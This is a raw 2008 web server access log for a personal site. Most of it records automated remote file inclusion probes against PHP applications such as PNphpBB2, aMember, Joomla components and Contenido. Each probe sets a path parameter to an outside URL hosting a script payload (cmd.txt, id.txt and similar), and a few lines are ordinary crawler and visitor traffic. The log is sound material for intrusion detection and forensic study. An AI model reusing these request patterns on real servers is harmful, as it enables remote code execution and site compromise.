125.246.154.68 - - [04/Nov/2008:08:32:58 -0800] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://dcarguy.com/subscription/amember.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
125.246.154.68 - - [04/Nov/2008:08:32:59 -0800] "GET /logs/access_080429.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://dcarguy.com/subscription/amember.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.222.4.51 - - [04/Nov/2008:08:33:02 -0800] "GET /galleria.html.php?mosConfig_absolute_path=http://beschriftungsworld.de/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.94.252.14 - - [04/Nov/2008:08:33:06 -0800] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://shalonprice.com/cmsAdmin/uploads/thumb/bo.do? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
195.94.252.14 - - [04/Nov/2008:08:33:07 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://shalonprice.com/cmsAdmin/uploads/thumb/bo.do? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
63.246.30.14 - - [04/Nov/2008:08:33:08 -0800] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://dcarguy.com/subscription/amember.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.246.30.14 - - [04/Nov/2008:08:33:08 -0800] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://dcarguy.com/subscription/amember.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.246.30.14 - - [04/Nov/2008:08:33:08 -0800] "GET /logs/access_080515.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://dcarguy.com/subscription/amember.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
117.110.136.131 - - [04/Nov/2008:08:33:16 -0800] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://dcarguy.com/subscription/amember.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
117.110.136.131 - - [04/Nov/2008:08:33:16 -0800] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://dcarguy.com/subscription/amember.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
125.246.154.68 - - [04/Nov/2008:08:33:16 -0800] "GET /logs/access_080515.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://dcarguy.com/subscription/amember.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
125.246.154.68 - - [04/Nov/2008:08:33:16 -0800] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://dcarguy.com/subscription/amember.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.68.10.118 - - [04/Nov/2008:08:34:24 -0800] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.68.10.118 - - [04/Nov/2008:08:34:29 -0800] "GET /logs/access_080722.log%20/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.68.10.118 - - [04/Nov/2008:08:34:34 -0800] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.68.10.118 - - [04/Nov/2008:08:34:34 -0800] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.68.10.118 - - [04/Nov/2008:08:34:47 -0800] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.68.10.118 - - [04/Nov/2008:08:34:53 -0800] "GET /logs/access_080722.log%20/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.68.10.118 - - [04/Nov/2008:08:35:02 -0800] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.68.10.118 - - [04/Nov/2008:08:35:02 -0800] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
59.126.46.141 - - [04/Nov/2008:08:35:04 -0800] "GET /logs/access_080820.log/phphtml.php?htmlclass_path=http://www.dsfashion.nl/resources/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.44.26 - - [04/Nov/2008:08:35:05 -0800] "GET /logs/access_080530.log/contenido/classes/class.inuse.php?cfg[path][contenido]=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
222.236.44.26 - - [04/Nov/2008:08:35:05 -0800] "GET /logs/contenido/classes/class.inuse.php?cfg[path][contenido]=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
67.150.159.206 - - [04/Nov/2008:08:35:10 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
67.150.159.206 - - [04/Nov/2008:08:35:10 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
67.150.159.206 - - [04/Nov/2008:08:35:10 -0800] "GET /logs/access_080329.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
196.12.157.26 - - [04/Nov/2008:08:35:19 -0800] "GET /logs/access_080723.log//index.php?DOCUMENT_ROOT=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.68.10.118 - - [04/Nov/2008:08:35:22 -0800] "GET /logs/access_080722.log%20/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.236.44.26 - - [04/Nov/2008:08:35:24 -0800] "GET /contenido/classes/class.inuse.php?cfg[path][contenido]=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
65.55.109.77 - - [04/Nov/2008:08:35:47 -0800] "GET /?show=gallery&pageid=172&nggpage=17 HTTP/1.0" 200 159889 "http://search.live.com/results.aspx?q=allan" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
65.55.109.77 - - [04/Nov/2008:08:35:48 -0800] "GET /blog/wp-content/themes/default/style.css HTTP/1.0" 200 9232 "http://www.dmulk.com/?show=gallery&pageid=172&nggpage=17" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "dmulk.com"
195.94.252.14 - - [04/Nov/2008:08:35:48 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://shalonprice.com/cmsAdmin/uploads/thumb/bo.do? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
65.55.109.77 - - [04/Nov/2008:08:35:48 -0800] "GET /blog/wp-content/plugins/nggallery/css/nggallery.css HTTP/1.0" 200 5241 "http://www.dmulk.com/?show=gallery&pageid=172&nggpage=17" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "dmulk.com"
195.94.252.14 - - [04/Nov/2008:08:35:48 -0800] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://shalonprice.com/cmsAdmin/uploads/thumb/bo.do? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
65.55.109.77 - - [04/Nov/2008:08:35:48 -0800] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox.css HTTP/1.0" 200 4019 "http://www.dmulk.com/?show=gallery&pageid=172&nggpage=17" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "dmulk.com"
65.55.109.77 - - [04/Nov/2008:08:35:48 -0800] "GET /blog/wp-includes/js/jquery/jquery.js?ver=1.2.3 HTTP/1.0" 200 29867 "http://www.dmulk.com/?show=gallery&pageid=172&nggpage=17" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "dmulk.com"
65.55.109.77 - - [04/Nov/2008:08:35:49 -0800] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox-pack.js?ver=3.1.1 HTTP/1.0" 200 8888 "http://www.dmulk.com/?show=gallery&pageid=172&nggpage=17" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "dmulk.com"
65.55.109.77 - - [04/Nov/2008:08:35:49 -0800] "GET /blog/wp-content/plugins/nggallery/admin/js/swfobject.js?ver=1.5 HTTP/1.0" 200 6722 "http://www.dmulk.com/?show=gallery&pageid=172&nggpage=17" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "dmulk.com"
222.236.44.26 - - [04/Nov/2008:08:36:32 -0800] "GET /logs/access_080725.log//index.php?DOCUMENT_ROOT=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
222.236.44.26 - - [04/Nov/2008:08:36:33 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 200 94933 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
222.236.44.26 - - [04/Nov/2008:08:36:38 -0800] "GET /logs/access_080723.log//index.php?DOCUMENT_ROOT=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
222.236.44.26 - - [04/Nov/2008:08:37:05 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
83.140.32.144 - - [04/Nov/2008:08:37:20 -0800] "GET /?_zb_path=http://www.asa-auto.ba/mambo/cache/v6id.txt????? HTTP/1.1" 200 94767 "-" "libwww-perl/5.805" "www.dmulk.com"
83.140.32.144 - - [04/Nov/2008:08:37:23 -0800] "GET /logs/access_081007.log//?_zb_path=http://www.asa-auto.ba/mambo/cache/v6id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.140.32.144 - - [04/Nov/2008:08:37:24 -0800] "GET /logs//?_zb_path=http://www.asa-auto.ba/mambo/cache/v6id.txt????? HTTP/1.1" 200 72168 "-" "libwww-perl/5.805" "www.dmulk.com"
218.145.65.133 - - [04/Nov/2008:08:37:48 -0800] "GET /logs/access_080312.log/alex_guestbook3/include/livre_include.php?no_connect=lol&chem_absolu=http://botok.xtgem.com/id/idp8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
63.246.30.14 - - [04/Nov/2008:08:38:03 -0800] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://dcarguy.com/subscription/amember.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.140.32.144 - - [04/Nov/2008:08:38:05 -0800] "GET /logs/access_081008.log//?_zb_path=http://www.asa-auto.ba/mambo/cache/v6id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.140.32.144 - - [04/Nov/2008:08:38:05 -0800] "GET /logs/access_081007.log//?_zb_path=http://www.asa-auto.ba/mambo/cache/v6id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.140.32.144 - - [04/Nov/2008:08:38:05 -0800] "GET /logs//?_zb_path=http://www.asa-auto.ba/mambo/cache/v6id.txt????? HTTP/1.1" 200 65194 "-" "libwww-perl/5.805" "www.dmulk.com"
117.110.136.131 - - [04/Nov/2008:08:38:06 -0800] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://dcarguy.com/subscription/amember.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.140.32.144 - - [04/Nov/2008:08:38:08 -0800] "GET /?_zb_path=http://www.asa-auto.ba/mambo/cache/v6id.txt????? HTTP/1.1" 200 65555 "-" "libwww-perl/5.805" "www.dmulk.com"
63.246.30.14 - - [04/Nov/2008:08:38:09 -0800] "GET /logs/access_080502.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://dcarguy.com/subscription/amember.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.140.32.144 - - [04/Nov/2008:08:38:13 -0800] "GET /logs/access_081008.log//?_zb_path=http://www.asa-auto.ba/mambo/cache/v6id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.236.44.26 - - [04/Nov/2008:08:38:45 -0800] "GET /logs/access_081008.log//index.php?DOCUMENT_ROOT=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
63.246.30.14 - - [04/Nov/2008:08:39:01 -0800] "GET /logs/access_080428.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://dcarguy.com/subscription/amember.do??? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.246.30.14 - - [04/Nov/2008:08:39:01 -0800] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://dcarguy.com/subscription/amember.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
117.110.136.131 - - [04/Nov/2008:08:39:04 -0800] "GET /logs/access_080428.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://dcarguy.com/subscription/amember.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
117.110.136.131 - - [04/Nov/2008:08:39:04 -0800] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://dcarguy.com/subscription/amember.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
125.246.154.68 - - [04/Nov/2008:08:39:10 -0800] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://dcarguy.com/subscription/amember.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
125.246.154.68 - - [04/Nov/2008:08:39:10 -0800] "GET /logs/access_080428.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://dcarguy.com/subscription/amember.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.68.51.126 - - [04/Nov/2008:08:39:11 -0800] "GET /logs/access_080725.log//index.php?DOCUMENT_ROOT=http://www.noertershausen.de/event/id_osyris.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.68.51.126 - - [04/Nov/2008:08:39:11 -0800] "GET /logs/access_080723.log//index.php?DOCUMENT_ROOT=http://www.noertershausen.de/event/id_osyris.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
117.110.136.131 - - [04/Nov/2008:08:39:13 -0800] "GET /logs/access_080502.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://dcarguy.com/subscription/amember.do??? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
125.246.154.68 - - [04/Nov/2008:08:39:15 -0800] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://dcarguy.com/subscription/amember.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
136.226.254.42 - - [04/Nov/2008:08:39:21 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4360M.JPG HTTP/1.1" 200 108624 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
136.226.254.42 - - [04/Nov/2008:08:39:22 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4367M.JPG HTTP/1.1" 200 83489 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
72.55.133.52 - - [04/Nov/2008:08:39:35 -0800] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.maxscan.org/irc/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.133.52 - - [04/Nov/2008:08:39:36 -0800] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.maxscan.org/irc/id.txt???? HTTP/1.1" 200 3711 "-" "libwww-perl/5.811" "www.dmulk.com"
154.5.252.194 - - [04/Nov/2008:08:39:37 -0800] "GET /logs/access_080908.log%20//index.php?DOCUMENT_ROOT=http://www.noertershausen.de/event/id_osyris.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.55.133.52 - - [04/Nov/2008:08:39:45 -0800] "GET /logs/access_080507.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.maxscan.org/irc/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
211.232.143.29 - - [04/Nov/2008:08:40:16 -0800] "GET /logs/access_080904.log//?_zb_path=http://damtare.by.ru/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.232.143.29 - - [04/Nov/2008:08:40:16 -0800] "GET /logs/access.log//?_zb_path=http://damtare.by.ru/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.232.143.29 - - [04/Nov/2008:08:40:16 -0800] "GET /logs//?_zb_path=http://damtare.by.ru/id.txt???%0D?? HTTP/1.1" 200 72168 "-" "libwww-perl/5.63" "www.dmulk.com"
211.232.143.29 - - [04/Nov/2008:08:40:17 -0800] "GET /?_zb_path=http://damtare.by.ru/id.txt???%0D?? HTTP/1.1" 200 94648 "-" "libwww-perl/5.63" "www.dmulk.com"
211.232.143.29 - - [04/Nov/2008:08:40:26 -0800] "GET /vbgsitemap/vbgsitemap-config.php?base=http://damtare.by.ru/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.232.143.29 - - [04/Nov/2008:08:40:26 -0800] "GET /logs/access_080131.log//vbgsitemap/vbgsitemap-config.php?base=http://damtare.by.ru/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.232.143.29 - - [04/Nov/2008:08:40:26 -0800] "GET /logs//vbgsitemap/vbgsitemap-config.php?base=http://damtare.by.ru/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
72.55.133.52 - - [04/Nov/2008:08:40:39 -0800] "GET /logs/access_080915.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.maxscan.org/irc/id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
211.232.143.29 - - [04/Nov/2008:08:41:23 -0800] "GET /logs/access_080523.log//vbgsitemap/vbgsitemap-config.php?base=http://damtare.by.ru/id.txt????? HTTP/1.0" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
74.6.18.252 - - [04/Nov/2008:08:41:27 -0800] "GET /logs/access_071106.log HTTP/1.0" 200 29238 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
222.236.44.26 - - [04/Nov/2008:08:42:50 -0800] "GET /logs/access_080908.log//index.php?DOCUMENT_ROOT=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
193.84.183.38 - - [04/Nov/2008:08:43:32 -0800] "GET /logs/access_080901.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.84.183.38 - - [04/Nov/2008:08:43:32 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.84.183.38 - - [04/Nov/2008:08:43:32 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.16.18 - - [04/Nov/2008:08:44:05 -0800] "GET /logs/access_080302.log/index.php?option=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
87.106.16.18 - - [04/Nov/2008:08:44:05 -0800] "GET /logs/index.php?option=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
87.106.16.18 - - [04/Nov/2008:08:44:06 -0800] "GET /index.php?option=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 200 94751 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
87.106.16.18 - - [04/Nov/2008:08:44:07 -0800] "GET /logs/access_080307.log/index.php?option=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
66.249.67.57 - - [04/Nov/2008:08:44:15 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
66.249.67.57 - - [04/Nov/2008:08:44:16 -0800] "GET /blog/index.php/2008/04/12/great-day-for-a-ride/feed/ HTTP/1.1" 200 2891 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
87.106.16.18 - - [04/Nov/2008:08:44:39 -0800] "GET /logs/access_080711.log/index.php?option=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
87.106.16.18 - - [04/Nov/2008:08:44:39 -0800] "GET /logs/index.php?option=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
87.106.16.18 - - [04/Nov/2008:08:44:40 -0800] "GET /index.php?option=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 200 94735 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
87.106.16.18 - - [04/Nov/2008:08:44:45 -0800] "GET /logs/access_080907.log/index.php?option=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
195.3.194.35 - - [04/Nov/2008:08:44:52 -0800] "GET /logs/access_080908.log%20//index.php?DOCUMENT_ROOT=http://bugisku.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.3.194.35 - - [04/Nov/2008:08:44:56 -0800] "GET /logs/access_080908.log%20//index.php?DOCUMENT_ROOT=http://www.imperaportal.info/amt/pepekid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.109.103.145 - - [04/Nov/2008:08:45:39 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://excelent.do.am/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
210.109.103.145 - - [04/Nov/2008:08:45:39 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://excelent.do.am/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
74.52.71.162 - - [04/Nov/2008:08:46:04 -0800] "GET /logs/access_080811.log//administrator/components/com_virtuemart/virtuemart.cfg.php?mosConfig_absolute_path=http://www.kuiwa.at/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.71.162 - - [04/Nov/2008:08:46:04 -0800] "GET /administrator/components/com_virtuemart/virtuemart.cfg.php?mosConfig_absolute_path=http://www.kuiwa.at/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.71.162 - - [04/Nov/2008:08:46:04 -0800] "GET /logs//administrator/components/com_virtuemart/virtuemart.cfg.php?mosConfig_absolute_path=http://www.kuiwa.at/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.249.67.57 - - [04/Nov/2008:08:46:18 -0800] "GET /blog/wp-login.php?action=lostpassword HTTP/1.1" 200 1567 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
194.170.60.110 - - [04/Nov/2008:08:46:26 -0800] "GET /logs/access_080329.log//phpshop/index.php?base_dir=http://www.natuurenwetenschap.be/banners/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
